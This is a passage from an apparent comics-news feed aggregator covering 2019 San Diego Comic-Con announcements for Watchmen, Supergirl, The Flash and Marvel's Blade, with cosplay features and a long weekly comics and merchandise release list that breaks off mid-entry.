Feed aggregator

From Damon Lindelof and set in an alternate history where masked vigilantes are treated as outlaws, this drama series embraces the nostalgia of the original groundbreaking graphic novel of the same name while attempting to break new ground of its own. The cast includes Regina King, Jeremy Irons, Don Johnson, Jean Smart, Tim Blake Nelson, Louis Gossett Jr., Yahya Abdul-Mateen II, Hong Chau, Andrew Howard, Tom Mison, Frances Fisher, Jacob Ming-Trent, Sara Vickers, Dylan Schombing, and James Wolk.

Watchmen is based on the graphic novel co-created and illustrated by Dave Gibbons and published by DC.

Get an exclusive first look at the Supergirl Season 5 trailer released at San Diego Comic-Con 2019, including a look at Kara’s new suit (the costume has pants now!) and her upcoming battle with Lena Luthor, now that Lena knows Kara’s secret. Supergirl Season 5 premieres Sunday, October 6 on The CW in the US.

Get a first look at The Flash Season 6 trailer which debuted at Comic-Con 2019. The new season features Sendhil Ramamurthy as the DC Comics villain Bloodwork, aka Ramsey Rosso, and the footage also teases the impending Arrowverse crossover Crisis on Infinite Earths, which will span episodes of The Flash, Arrow, Supergirl, Batwoman, and DC’s Legends of Tomorrow. The Flash Season 6 premieres Tuesday, October 8 at 8 p.m. on The CW.

Today at San Diego Comic-Con 2019, Marvel Studios took to the stage in Hall H to reveal the upcoming movies and TV shows from the studio – including the next chapter of the Marvel Cinematic Universe and what’s planned for Disney+.

Following presentation for Marvel Studios’ Black Widow, Feige had another big surprise up his sleeve for the enthusiastic Hall H crowd. He was joined on stage by actor Mahershala Ali and then announced the new Marvel Studios feature film Blade that Ali will star in.

Once again, Supergirl landed at Comic-Con with another superpowered panel filled with surprises and reveals about the eagerly awaited upcoming season. Perhaps most striking for fans is that the character of Kara Zor-El aka Supergirl (played by Melissa Benoist) will be sporting a new Kryptonian supersuit — the first revamp since her co-worker, friend, and confidante Winn Schott designed her iconic red and blue gear in season one. And two new characters will also be on the scene in National City this season.

NEW SUPERSUIT

The new suit, conceptualized by Supergirl costume designer Victoria Auth and created by Ironhead Studios and Bill Hargates Costumes, follows the evolution of supersuits in executive producer Greg Berlanti’s “Arrowverse,” which has seen redesigns of both the Arrow and Flash suits in recent years.

Regarding Kara’s new look, executive producers Jessica Queller and Robert Rovner said: “We’re beyond excited to update Supergirl’s iconic suit. We think her new image is strong and powerful. We hope the fans are as excited about it as we are.”

NEW CHARACTERS AND SERIES REGULARS

In addition to the first official unveiling of the new Supergirl supersuit, the show’s producers announced that two new characters will be joining the action in National City for the upcoming season: DC’s Andrea Rojas (aka Acrata) and renowned reporter William Dey.

Julie Gonzalo (Veronica Mars, Dallas, Eli Stone) will star as iconic DC character Andrea Rojas (aka Acrata). A polished businesswoman and heir to a Central American tech empire, Andrea Rojas (aka Acrata) is now making a hostile advance into the world of media. Unapologetic and unafraid to make waves, she also holds a mystical secret. Gonzalo will first appear as Rojas in the season premiere on Sunday, October 6, at 9/8c on The CW.

UK-based actor Staz Nair — who is perhaps best known for playing Qhono, a Dothraki warrior loyal to Daenerys Targaryen on Game of Thrones — will play hardened reporter William Dey, an original character created for the series. On the surface, he’s a cynic and a sellout who looks down on Kara’s earnest idealism. Dey’s not interested in making friends, he just wants to get the story — but his ties to the criminal underworld could prove problematic. Nair (Game of Thrones, FOX’s The Rocky Horror Picture Show, AMC’s Humans) as William Dey will also make his debut during the season premiere episode.

Supergirl returns for its fifth season on Sunday, October 6, at 9/8c on The CW. Produced by Berlanti Productions in association with Warner Bros. Television and based on DC characters created by Jerry Siegel and Joe Shuster, Supergirl stars Melissa Benoist as Kara Danvers/Supergirl, Mehcad Brooks as James Olsen, Chyler Leigh as Alex Danvers, Katie McGrath as Lena Luthor, Jesse Rath as Brainiac, Nicole Maines as Nia Nal, Azie Tesfai as Kelly Olsen, Andrea Brooks as Eve Tessmacher, with David Harewood as J’onn J’onzz. Greg Berlanti, Jessica Queller, Robert Rovner and Sarah Schechter are executive producers.

This week’s Cosplay Girl of the Week Michelle Peck as Dawnstar from Legion of Superheroes

If you would like to be the Cosplay Girl of the Week! Please send your photo to Giovanni.Aria@firstcomicsnews.com and you will be considered for inclusion in a future edition of Superhero Girls!

This week’s Cosplay Dude of the Week

If you would like to be the Cosplay Guy of the Week! Please send your photo to Alex.Wright@firstcomicsnews.com and you will be considered for inclusion in a future edition of Superhero Dudes!

This week’s Cosplay Team of the Week

If you would like to be the Cosplay Team of the Week!
Please send your photo to Alex.Wright@firstcomicsnews.com and you will be considered for inclusion in a future edition of Superhero Team!



New Releases For 7/24/2019 PREMIER PUBLISHERS BOOM! STUDIOS MAY191235 BONE PARISH #11 (OF 12) $3.99 MAY191249 LUMBERJANES #64 CVR A MAIN LEYH $3.99 MAY191250 LUMBERJANES #64 CVR B PREORDER CHAU VAR $3.99 MAR191301 LUMBERJANES TP VOL 12 $14.99 MAY191219 MIGHTY MORPHIN POWER RANGERS #41 CVR A MAIN CAMPBELL $3.99 MAY198769 MIGHTY MORPHIN POWER RANGERS #41 FOC MORA VAR $3.99 MAY191221 MIGHTY MORPHIN POWER RANGERS #41 FOIL MONTES VAR $4.99 MAR191291 SONS OF ANARCHY LEGACY ED TP VOL 03 $29.99 DARK HORSE COMICS MAR190274 ALIENS RESCUE #1 CVR A DE LA TORRE $3.99 MAR190275 ALIENS RESCUE #1 CVR B CHATER $3.99 MAR190377 EROMANGA SENSEI TP VOL 03 $11.99 MAR190336 EXTRAORDINARY TP STORY OF ORDINARY PRINCESS $12.99 MAR190299 HARROW COUNTY LIBRARY EDITION HC VOL 03 $39.99 MAY190253 INVISIBLE KINGDOM #5 (MR) $3.99 FEB190390 MOB PSYCHO 100 TP VOL 03 (MR) $11.99 MAY190268 STARCRAFT SURVIVORS #1 (OF 4) $3.99 MAR190318 TOM CLANCYS DIVISION HC EXTREMIS MALIS $14.99 MAR190320 TOMB RAIDER OMNIBUS TP VOL 01 $29.99 MAR190278 WILLIAM GIBSON ALIEN 3 HC $19.99 DC COMICS MAY190374 ACTION COMICS #1013 CARD STOCK VAR ED YOTV THE OFFER $4.99 MAY190373 ACTION COMICS #1013 YOTV THE OFFER $3.99 MAY190380 BATGIRL #37 CARD STOCK VAR ED YOTV THE OFFER $4.99 MAY190379 BATGIRL #37 YOTV THE OFFER $3.99 MAY190381 BATMAN BEYOND #34 $3.99 MAY190382 BATMAN BEYOND #34 VAR ED $3.99 APR190527 BATMAN BEYOND TP VOL 05 THE FINAL JOKE $16.99 MAY190356 BATMAN CURSE OF THE WHITE KNIGHT #1 (OF 8) $4.99 MAY190357 BATMAN CURSE OF THE WHITE KNIGHT #1 (OF 8) VAR ED $4.99 MAY190392 BOOKS OF MAGIC #10 (MR) $3.99 DEC180680 DC DESIGNER SER WONDER WOMAN BY JENNY FRISON STATUE $150.00 NOV180560 DC UNIVERSE BRONZE AGE OMNIBUS BY JACK KIRBY HC $150.00 MAY190403 DETECTIVE COMICS #1008 CARD STOCK VAR ED YOTV THE OFFER $4.99 MAY190402 DETECTIVE COMICS #1008 YOTV THE OFFER $3.99 MAY190404 DIAL H FOR HERO #5 (OF 6) $3.99 MAY190412 FLASH #75 CARD STOCK VAR ED YOTV THE OFFER $5.99 MAY190411 FLASH #75 YOTV THE OFFER $4.99 MAY190416 FREEDOM FIGHTERS #7 (OF 12) $3.99 APR190547 HELLBLAZER TP VOL 21 THE LAUGHING MAGICIAN (MR) $24.99 APR190546 HOUSE OF WHISPERS TP VOL 01 THE POWER DIVIDED (MR) $16.99 MAY190430 JUSTICE LEAGUE DARK #13 CARD STOCK VAR ED YOTV THE OFFER $4.99 MAY190429 JUSTICE LEAGUE DARK #13 YOTV THE OFFER $3.99 MAY190432 LOONEY TUNES #250 $2.99 MAY190435 MARTIAN MANHUNTER #7 (OF 12) $3.99 MAY190436 MARTIAN MANHUNTER #7 (OF 12) VAR ED $3.99 MAY190444 SCOOBY DOO TEAM UP #49 $2.99 MAY198771 SUPERMAN YEAR ONE #1 (OF 3) 2ND PTG (MR) $7.99 MAY190455 TERRIFICS #18 CARD STOCK VAR ED YOTV THE OFFER $4.99 MAY190454 TERRIFICS #18 YOTV THE OFFER $3.99 MAY190461 WONDER WOMAN #75 CARD STOCK VAR ED YOTV THE OFFER $5.99 MAY190460 WONDER WOMAN #75 YOTV THE OFFER $4.99 DYNAMITE MAR191075 ALTERED CARBON DOWNLOAD BLUES HC SGN ED $39.99 FEB191103 CRACKDOWN #3 CVR A JAIME $3.99 MAR191186 JAMES BOND ORIGIN HC VOL 01 $24.99 APR191124 MARS ATTACKS TP $19.99 FEB191177 PATHFINDER GOBLINS TP $19.99 MAY191112 RED SONJA #6 CONNER VIRGIN CVR $50.00 MAY191113 RED SONJA #6 LINSNER VIRGIN CVR $50.00 MAY191138 WARLORD OF MARS ATTACKS #2 CVR A HILDEBRANDT $3.99 MAY191139 WARLORD OF MARS ATTACKS #2 CVR B CASE $3.99 MAY191140 WARLORD OF MARS ATTACKS #2 CVR C VILLALOBOS $3.99 MAY191141 WARLORD OF MARS ATTACKS #2 CVR D CALDWELL $3.99 IDW PUBLISHING MAY190582 CLUE CANDLESTICK #3 CVR A SHAW $4.99 JAN190750 COMPLETE CHESTER GOULD DICK TRACY HC VOL 26 $44.99 MAY190613 DISNEY COMICS AND STORIES #6 CVR A MAZZARELLO $5.99 MAR198832 DUNGEONS & DRAGONS A DARKENED WISH #2 (OF 5) CVR B CHARACTER $3.99 JAN190760 DUNGEONS & DRAGONS A DARKENED WISH #2 CVR A FOWLER $3.99 MAY190556 GLOW SUMMER SPECIAL ONE-SHOT #1 CVR A STERLE $3.99 FEB190694 GO BOTS TP VOL 01 $17.99 FEB190748 LODGER TP VOL 01 $17.99 NOV180703 MAGIC THE GATHERING CHANDRA #3 OUM $3.99 MAR190631 MARVEL ACTION AVENGERS #6 SOMMARIVA $3.99 MAY190600 MARVEL ACTION CLASSICS HULK #1 CVR A SANTACRUZ $4.99 MAY190620 MY LITTLE PONY FRIENDSHIP IS MAGIC #80 CVR A SHERRON $3.99 MAY190621 MY LITTLE PONY FRIENDSHIP IS MAGIC #80 CVR B RICHARD $3.99 JAN190849 NIGHT MOVES #5 (OF 5) BURNHAM $3.99 DEC180805 RED PANDA & MOON BEAR TP VOL 01 $14.99 MAY190590 SONIC THE HEDGEHOG #19 CVR A JAMPOLE $3.99 MAY190591 SONIC THE HEDGEHOG #19 CVR B WELLS GRAHAM $3.99 MAR190640 SONIC THE HEDGEHOG TP VOL 03 BATTLE FOR ANGEL ISLAND $15.99 MAY190557 STAR PIG #1 (OF 4) CVR A RICHARD $3.99 APR190631 STAR TREK Q CONFLICT #6 (OF 6) CVR A MESSINA $3.99 APR190632 STAR TREK Q CONFLICT #6 (OF 6) CVR B MESSINA $3.99 MAR190647 STAR WARS ADVENTURES TP VOL 06 FLIGHT OF FALCON $9.99 MAR190668 TANGLED THE SERIES HAIR RAISING ADVENTURES TP $9.99 MAY190567 TMNT RISE OF TMNT SOUND OFF #1 (OF 3) CVR A THOMAS $3.99 IMAGE COMICS MAY190053 ASCENDER #4 (MR) $3.99 MAY190061 CURSE WORDS #23 CVR A BROWNE (MR) $3.99 MAY190062 CURSE WORDS #23 CVR B BROWNE INTERCONNECTED (MR) $3.99 MAY190066 FARMHAND #10 (MR) $3.99 MAY190081 LAZARUS RISEN #2 (MR) $7.99 MAY198629 LITTLE BIRD #1 (OF 5) 4TH PTG (MR) $3.99 MAY190085 MIDDLEWEST #9 (MR) $3.99 MAY190094 REDNECK #22 (MR) $3.99 MAY190045 SELF MADE TP (MR) $16.99 MAY190102 SKYWARD #15 $3.99 MAY198790 SPAWN #298 2ND PTG $2.99 MAY190113 WEATHERMAN VOL 2 #2 CVR A FOX (MR) $3.99 MAY190114 WEATHERMAN VOL 2 #2 CVR B ROBINSON (MR) $3.99 MAY198072 WEATHERMAN VOL 2 #2 CVR C MIGNOLA (MR) $3.99 MAR190257 WICKED & DIVINE #44 CVR A MCKELVIE & WILSON (MR) $3.99 MAR190258 WICKED & DIVINE #44 CVR B RIOS & MUERTO (MR) $3.99 MARVEL COMICS MAY190907 AGE OF CONAN BELIT #5 (OF 5) $3.99 MAY190909 AGE OF CONAN BELIT #5 (OF 5) CHRISTOPHER ACTION FIGURE VAR $3.99 MAY190825 AMAZING SPIDER-MAN #26 $3.99 MAY190968 BLACK PANTHER TP BOOK 07 INTERG EMPIRE WAKANDA PT 02 $17.99 JAN191082 CONAN THE BARBARIAN ORIGINAL MARVEL YEARS OMNIBUS HC VOL 02 $125.00 MAY198635 DAREDEVIL #7 2ND PTG ZDARSKY VAR $3.99 APR190865 DOCTOR STRANGE #16 $3.99 APR190866 DOCTOR STRANGE #16 YARDIN SPIDER-MAN STEALTH SUIT VAR $3.99 MAY190735 FEARLESS #1 (OF 3) $4.99 MAY190736 FEARLESS #1 (OF 3) FRISON CONNECTING VAR $4.99 MAY198636 GUARDIANS OF THE GALAXY #6 2ND PTG SHAW VAR $3.99 MAY190851 GUARDIANS OF THE GALAXY #7 $3.99 MAY190852 GUARDIANS OF THE GALAXY #7 CAMUNCOLI CARNAGE-IZED VAR $3.99 MAY190714 HISTORY OF MARVEL UNIVERSE #1 (OF 6) $4.99 MAY190715 HISTORY OF MARVEL UNIVERSE #1 (OF 6) RODRIGUEZ VAR $4.99 MAY190690 HOUSE OF X #1 (OF 6) $5.99 MAY190702 HOUSE OF X #1 (OF 6) BLANK VAR $5.99 MAY190691 HOUSE OF X #1 (OF 6) BROOKS CONNECTING VAR $5.99 MAY190695 HOUSE OF X #1 (OF 6) CHARACTER DECADES VAR $5.99 MAY190692 HOUSE OF X #1 (OF 6) CHRISTOPHER ACTION VAR $5.99 MAY190694 HOUSE OF X #1 (OF 6) PICHELLI FLOWER VAR $5.99 MAY190699 HOUSE OF X #1 (OF 6) YOUNG VAR $5.99 MAY190974 HULK TP WORLD WAR HULK NEW PTG $24.99 MAY190871 MAGNIFICENT MS MARVEL #5 $3.99 MAY198165 MAJOR X #4 (OF 6) 2ND PTG LIEFELD VAR $3.99 MAY198637 MAJOR X #5 (OF 6) 2ND PTG LIEFELD VAR $3.99 MAY198638 MARVEL COMICS PRESENTS #6 2ND PTG FRIGERI VAR $4.99 MAY190889 MARVEL RISING #5 (OF 5) $3.99 MAY190806 MARVEL TALES HULK #1 $7.99 MAY190951 MARVEL VISIONARIES TP ROY THOMAS $34.99 MAY190681 MARVELS EPILOGUE #1 $4.99 MAY190684 MARVELS EPILOGUE #1 LIM VAR $4.99 MAY190685 MARVELS EPILOGUE #1 YOUNG VAR $4.99 APR190939 MILES MORALES GN TP SPIDER-MAN $12.99 MAY190877 MOON GIRL AND DEVIL DINOSAUR #45 $3.99 MAY190982 PUNISHER TP RETURN TO BIG NOTHING $24.99 MAY198640 SAVAGE SWORD OF CONAN #6 2ND PTG FINCH VAR $3.99 MAY190954 SAVAGE SWORD OF CONAN TP VOL 01 CULT OF KOGA THUN $17.99 MAY190955 SAVAGE SWORD OF CONAN TP VOL 01 CULT OF KOGA THUN B&W DM VAR $17.99 MAY190790 SECRET WARPS ARACHKNIGHT ANNUAL #1 $4.99 MAY190791 SECRET WARPS ARACHKNIGHT ANNUAL #1 PACHECO CONNECTING VAR $4.99 MAY190861 SHURI #10 $3.99 MAY198639 SPIDER-MAN CITY AT WAR #4 (OF 6) 2ND PTG BANDINI VAR $3.99 MAY198641 SPIDER-MAN LIFE STORY #1 (OF 6) 3RD PTG ZDARSKY VAR $4.99 MAY198642 SPIDER-MAN LIFE STORY #2 (OF 6) 3RD PTG ZDARSKY VAR $4.99 MAY190915 STAR WARS #69 $3.99 MAY190916 STAR WARS #69 CHRISTOPHER ACTION FIGURE VAR $3.99 MAY190757 SWORD MASTER #1 $3.99 MAY190758 SWORD MASTER #1 CHRISTOPHER ACTION FIGURE VAR $3.99 MAY190957 THOR OF REALMS TP $29.99 MAY190738 TONY STARK IRON MAN #14 $3.99 MAY190739 TONY STARK IRON MAN #14 FERRY CARNAGE-IZED VAR $3.99 MAY190771 TRUE BELIEVERS ABSOLUTE CARNAGE MANIA #1 $1.00 MAY190772 TRUE BELIEVERS ABSOLUTE CARNAGE SEPARATION ANXIETY #1 $1.00 MAY190727 VALKYRIE JANE FOSTER #1 $3.99 MAY190730 VALKYRIE JANE FOSTER #1 HETRICK VAR $3.99 MAY198628 WAR OF REALMS NEW AGENTS OF ATLAS #1 (OF 4) 3RD PTG VAR $3.99 MAY190842 WEB OF VENOM FUNERAL PYRE #1 $4.99 MAY190764 X-MEN #137 FACSIMILE EDITION $4.99 COMICS & GRAPHIC NOVELS APR191266 ABERRANT SEASON 2 #5 (OF 5) CVR A LEON DIAS (MR) $3.99 APR191267 ABERRANT SEASON 2 #5 (OF 5) CVR B LEON DIAS (MR) $3.99 MAY191285 ABERRANT SEASON 2 TP (MR) $14.99 MAY191884 AFTERBURN CROSSFIRE #3 (OF 4) $3.95 MAY191835 AKISSI MORE TALES OF MISCHIEF GN $14.95 MAY191356 AM ARCHIVES LAUREL & HARDY #1 CVR A 1967 MAIN $3.99 MAY191357 AM ARCHIVES LAUREL & HARDY #1 CVR B 1967 LTD ED RETRO $9.99 MAY191423 ARCHIE #706 (ARCHIE & SABRINA PT 2) CVR A FISH (RES) $3.99 MAY191424 ARCHIE #706 (ARCHIE & SABRINA PT 2) CVR B ISAACS (RES) $3.99 MAY191425 ARCHIE #706 (ARCHIE & SABRINA PT 2) CVR C MOONEY (RES) $3.99 MAY191428 ARCHIE & ME TP VOL 02 $10.99 MAY191404 ARCHIE VS PREDATOR 2 #1 (OF 5) CVR A HACK $3.99 MAY191405 ARCHIE VS PREDATOR 2 #1 (OF 5) CVR B BURCHETT $3.99 MAY191406 ARCHIE VS PREDATOR 2 #1 (OF 5) CVR C DEREK CHARM $3.99 MAY191407 ARCHIE VS PREDATOR 2 #1 (OF 5) CVR D FRANCAVILLA $3.99 MAY191408 ARCHIE VS PREDATOR 2 #1 (OF 5) CVR E DAN PARENT $3.99 MAY191409 ARCHIE VS PREDATOR 2 #1 (OF 5) CVR F TUCCI $3.99 MAY191793 AT THE END OF YOUR TETHER #2 (OF 3) $4.99 MAY191432 BETTY & VERONICA JUMBO COMICS DIGEST #275 $6.99 MAY192163 CASE CLOSED GN VOL 71 $9.99 MAR191439 CAVEWOMAN RESCUE PARTY ONE SHOT COVER A MASSEY (MR) $3.99 MAR191440 CAVEWOMAN RESCUE PARTY ONE SHOT COVER B MASSEY NUDE (M $PI MAR191441 CAVEWOMAN RESCUE PARTY ONE SHOT COVER C MASSEY NUDE (M $PI MAR191442 CAVEWOMAN RESCUE PARTY ONE SHOT COVER D BUDD ROOT (MR) $PI MAR191443 CAVEWOMAN RESCUE PARTY ONE SHOT COVER E BUDD ROOT SPEC ED NU $PI MAR191444 CAVEWOMAN RESCUE PARTY ONE SHOT COVER F YEN SAN SPEC ED TOPL $PI MAR191445 CAVEWOMAN RESCUE PARTY ONE SHOT COVER G FANTINI TOPLESS CVR $PI MAY191892 CRUCIFIED #2 $3.99 MAY191313 DARK RED #5 $3.99 MAY191787 DRAWING BLOOD SPILLED INK #3 (OF 4) CVR A BISHOP (MR) $3.99 MAY191788 DRAWING BLOOD SPILLED INK #3 (OF 4) CVR B EASTMAN (MR) $3.99 MAY191893 ELECTRIC BLACK #2 $3.99 FEB191413 GOLD DIGGER #265 $3.99 MAY191327 GRUMBLE #8 (OF 5) $3.99 MAY191812 HONOR AND CURSE #6 $3.99 MAY192197 INTERSPECIES REVIEWERS GN VOL 02 (MR) $13.00 MAR191799 IRON MAIDEN LEGACY O/T BEAST VOL 2 NIGHT CITY #2 CVR A TBD $3.99 MAR191800 IRON MAIDEN LEGACY O/T BEAST VOL 2 NIGHT CITY #2 CVR B TBD $3.99 MAR191801 IRON MAIDEN LEGACY O/T BEAST VOL 2 NIGHT CITY #2 CVR C TBD $3.99 MAY191315 KILLER GROOVE #3 $3.99 MAY191606 LA MUERTA RETRIBUTION #1 (OF 2) RAW ED (MR) $25.00 APR191621 LADY DEATH THE RECKONING #1 25TH ANNIV SGN LTD ED (MR) $40.00 MAR191915 LETTER 44 DLX HC VOL 03 (MR) $59.99 MAY191961 LIFE IS STRANGE #7 CVR B GAME ART (MR) $3.99 MAY191962 LIFE IS STRANGE #7 CVR C TSHIRT (MR) $3.99 MAY191598 LIVE DIE RELOAD GN VOL 01 $12.99 MAY192022 LIVEWIRE #8 CVR A ROCAFORT $3.99 MAY192023 LIVEWIRE #8 CVR B RENAUD $3.99 MAY192024 LIVEWIRE #8 CVR C RAHZZAH $3.99 MAY198004 LIVEWIRE #8 CVR D PRE-ORDER BUNDLE ED $3.99 MAY191733 MAKING FRIENDS GN VOL 02 BACK TO DRAWING BOARD $12.99 MAY191734 MAKING FRIENDS HC GN VOL 02 BACK TO DRAWING BOARD $24.99 MAY191341 MONSTER WORLD GOLDEN AGE #1 (OF 6) CVR A KOWALSKI $3.99 MAY191342 MONSTER WORLD GOLDEN AGE #1 (OF 6) CVR B NAT JONES $3.99 MAY192069 OZ HEART OF MAGIC #4 (OF 5) CVR A VIGONTE $3.99 MAY192070 OZ HEART OF MAGIC #4 (OF 5) CVR B VITORINO $3.99 MAY192071 OZ HEART OF MAGIC #4 (OF 5) CVR C SPAY $3.99 MAY192072 OZ HEART OF MAGIC #4 (OF 5) CVR D COCCOLO $3.99 MAY191322 PLANET OF THE NERDS #4 (MR) $3.99 MAY192013 PSI-LORDS #2 CVR A NAKAYAMA $3.99 MAY192014 PSI-LORDS #2 CVR B WIJNGAARD $3.99 MAY192015 PSI-LORDS #2 CVR C HANS $3.99 MAY198005 PSI-LORDS #2 CVR D PRE-ORDER BUNDLE ED $3.99 MAY192159 RADIANT GN VOL 06 $9.99 MAY191621 RETURN TO ISLE OF THE LOST GN $12.99 MAY191622 RETURN TO ISLE OF THE LOST HC GN $21.99 APR191928 SABRETOOTH DAN TP VOL 01 (RES) $12.99 MAY192201 SACRIFICIAL PRINCESS & KING BEASTS GN VOL 06 $13.00 DEC181978 SCOTT PILGRIM COLOR COLLECTION TP BOX SET $89.99 DEC181979 SCOTT PILGRIM COLOR COLLECTION TP VOL 01 $29.99 DEC181980 SCOTT PILGRIM COLOR COLLECTION TP VOL 02 $29.99 DEC181981 SCOTT PILGRIM COLOR COLLECTION TP VOL 03 $29.99 MAY192185 SECRETLY IVE BEEN SUFFERING ABOUT BEING SEXLESS GN $15.00 MAY191599 SEEKER IDENTITY CRISIS VOL 01 $14.99 MAY191834 SKIP GN $22.95 MAY192186 SKULL-FACE BOOKSELLER HONDA-SAN GN VOL 01 $15.00 MAY191442 SOULFIRE VOL 8 #2 CVR A FORTE $3.99 MAY191443 SOULFIRE VOL 8 #2 CVR B TURNER $3.99 FEB191383 STARGATE UNIVERSE TP VOL 01 LTD ED PHOTO CVR $24.99 MAY192187 SURVIVED ALCHEMIST DREAM QUIET TOWN LIFE GN VOL 01 $13.00 MAY191939 TANK GIRL #5 CVR A PARSON $3.99 MAY191940 TANK GIRL #5 CVR B PANOSIAN $3.99 MAY191941 TANK GIRL #5 CVR C KANE $3.99 APR191599 TAROT WITCH OF THE BLACK ROSE #110 STUDIO DELUXE ED (MR) $19.99 APR192304 TO TAKE AN ENEMYS HEART GN VOL 05 (MR) $12.99 APR192305 TO TAKE AN ENEMYS HEART GN VOL 06 (MR) $12.99 MAY191681 TONTA HC LOVE & ROCKETS (MR) $19.99 MAY192188 TORTURE PRINCESS FREMD TORTURCHEN COMPLETE MANGA OMNIBUS (MR $30.00 SEP181471 TRUMP PUNCH MAN DELETE THIS ONE-SHOT $4.99 MAY191311 WALK THROUGH HELL #12 (MR) $3.99 MAY192189 WOOF WOOF STORY GN VOL 01 PAMPERED POOCH NOT FENRIR $13.00 MAY192089 YOKAI GIRLS GN VOL 08 (MR) $12.99 MAY192209 ZO ZO ZOMBIE GN VOL 04 $12.00 MAY191293 ZOMBIE TRAMP ONGOING #62 CVR A MACCAGNI (MR) $4.99 MAY191301 ZOMBIE TRAMP ONGOING #62 CVR B MACCAGNI RISQUE (MR) $4.99 MAY191302 ZOMBIE TRAMP ONGOING #62 CVR C GARCIA VAR (MR) $4.99 MAY191303 ZOMBIE TRAMP ONGOING #62 CVR D GARCIA RISQUE LTD ED (MR) $4.99 MAY191304 ZOMBIE TRAMP ONGOING #62 CVR E HARRIGAN LTD ED (MR) $4.99 MAY191305 ZOMBIE TRAMP ONGOING #62 CVR F HARRIGAN RISQUE LTD ED (MR) $4.99 MAGAZINES MAY191609 COMIC SHOP NEWS [90CT BUNDLE] #1675 $PI JUN191965 DISNEY MOVIE SPECIAL #4 LION KING $10.99 MAY191604 FANGORIA VOL 2 #4 $19.79 MAY191799 ROLLED AND TOLD #11 $7.99 MAY191970 STAR WARS INSIDER #191 NEWSSTAND ED $7.99 MAY191971 STAR WARS INSIDER #191 PX ED $7.99 BOOKS MAY191889 ASHS QUEST ESSENTIAL GUIDEBOOK POKEMON ASHS QUEST HC $14.99 MAY191736 BECOMING SUPERMAN MY JOURNEY FROM POVERTY TO HOLLYWOOD $28.99 MAY192178 BOTTOM-TIER CHARACTER TOMOZAKI LIGHT NOVEL SC VOL 01 $14.00 MAY192179 DIRTY WAY DESTROY GODDESS HERO NOVEL SC VOL 01 $14.00 MAY192171 FINAL FANTASY XIII 13-2 FRAGMENTS BEFORE NOVEL SC VOL 01 $14.00 MAY192180 LAST ROUND SCUM ARTHUR HERETIC MERLIN NOVEL SC VOL 01 $14.00 MAY191715 OVERSTREET GUIDE LTD S&N SC GUIDE TO COSPLAY $19.95 MAY191967 SPIDER-MAN FAR FROM HOME OFF MOVIE SPECIAL HC $19.99 MAY192176 SWORD ART ONLINE ALT GUN GALE LIGHT NOVEL SC VOL 04 $14.00 MERCHANDISE OCT188490 2001 SPACE ODYSSEY SPACE SUIT 100% & 400% BEA 2PK YELLOW VER $184.99 OCT188491 2001 SPACE ODYSSEY SPACE SUIT 1000% BEA YELLOW VER $604.99 APR198784 AVENGERS ENDGAME BLACK WIDOW LIFE SIZE STAND-UP $39.95 APR198785 AVENGERS ENDGAME CAPTAIN AMERICA LIFE SIZE STAND-UP $39.95 APR198786 AVENGERS ENDGAME HAWKEYE LIFE SIZE STAND-UP $39.95 APR198787 AVENGERS ENDGAME IRON MAN LIFE SIZE STAND-UP $39.95 APR198788 AVENGERS ENDGAME NEBULA LIFE SIZE STAND-UP $39.95 APR198789 AVENGERS ENDGAME THOR LIFE SIZE STAND-UP $39.95 JUL189243 BERSERK MOVIE GRIFFITH FIGMA AF $79.99 DEC189202 COSMO FLEET COLL MSG EFSF PEGASUS CLASS ASSAULT MINI FIG $29.99 FEB198998 D&D FIGURAL KEYRING 24PC BMB DS $6.99 DEC188072 DBZ WORLD COLOSSEUM 2 V5 FIG $24.99 APR192558 DC BATMAN UNIVERSE BUST COLL #30 1966 PENGUIN $24.95 MAY192402 DC BATMAN UNIVERSE BUST COLL #31 BVS BATMAN $24.95 MAY192403 DC BATMAN UNIVERSE BUST COLL #32 DARK KNIGHT RISES CATWOMAN $24.95 MAY192302 DC HEROES BATMAN I T/S LG $19.95 MAY192301 DC HEROES BATMAN I T/S MED $19.95 MAY192300 DC HEROES BATMAN I T/S SM $19.95 MAY192303 DC HEROES BATMAN I T/S XL $19.95 MAY192304 DC HEROES BATMAN I T/S XXL $22.95 MAY192317 DC HEROES BATMAN SMOKIN T/S LG $19.95 MAY192316 DC HEROES BATMAN SMOKIN T/S MED $19.95 MAY192315 DC HEROES BATMAN SMOKIN T/S SM $19.95 MAY192318 DC HEROES BATMAN SMOKIN T/S XL $19.95 MAY192319 DC HEROES BATMAN SMOKIN T/S XXL $22.95 MAY192292 DC HEROES DARKSEID IS SYMBOL T/S LG $19.95 MAY192291 DC HEROES DARKSEID IS SYMBOL T/S MED $19.95 MAY192290 DC HEROES DARKSEID IS SYMBOL T/S SM $19.95 MAY192293 DC HEROES DARKSEID IS SYMBOL T/S XL $19.95 MAY192294 DC HEROES DARKSEID IS SYMBOL T/S XXL $22.95 MAY192297 DC HEROES DARKSEID WANTS YOU SYMBOL T/S LG $19.95 MAY192296 DC HEROES DARKSEID WANTS YOU SYMBOL T/S MED $19.95 MAY192295 DC HEROES DARKSEID WANTS YOU SYMBOL T/S SM $19.95 MAY192298 DC HEROES DARKSEID WANTS YOU SYMBOL T/S XL $19.95 MAY192299 DC HEROES DARKSEID WANTS YOU SYMBOL T/S XXL $22.95 MAY192272 DC HEROES FLASH 2019 SYMBOL T/S LG $19.95 MAY192271 DC HEROES FLASH 2019 SYMBOL T/S MED $19.95 MAY192270 DC HEROES FLASH 2019 SYMBOL T/S SM $19.95 MAY192273 DC HEROES FLASH 2019 SYMBOL T/S XL $19.95 MAY192274 DC HEROES FLASH 2019 SYMBOL T/S XXL $22.95 MAY192312 DC HEROES MAD HATTER COFFEE TIME T/S LG $19.95 MAY192311 DC HEROES MAD HATTER COFFEE TIME T/S MED $19.95 MAY192313 DC HEROES MAD HATTER COFFEE TIME T/S XL $19.95 MAY192314 DC HEROES MAD HATTER COFFEE TIME T/S XXL $22.95 MAY192307 DC HEROES SUPERMAN PRIDE T/S LG $19.95 MAY192306 DC HEROES SUPERMAN PRIDE T/S MED $19.95 MAY192305 DC HEROES SUPERMAN PRIDE T/S SM $19.95 MAY192308 DC HEROES SUPERMAN PRIDE T/S XL $19.95 MAY192309 DC HEROES SUPERMAN PRIDE T/S XXL $22.95 AUG188409 DENNOU SHOUJO SIRO NENDOROID AF $64.99 OCT188809 DESKTOP ARMY B-101 FREYJA 3PC DISPLAY SET A $23.99 OCT188810 DESKTOP ARMY B-101 FREYJA 3PC DISPLAY SET B $23.99 SEP188722 DESKTOP ARMY SWORD ART ONLINE GUN GALE ONLINE 3PC DISPLAY (C $24.99 MAY193268 DIE HARD BOARD GAME $39.95 OCT188812 DIGIMON STUFFED 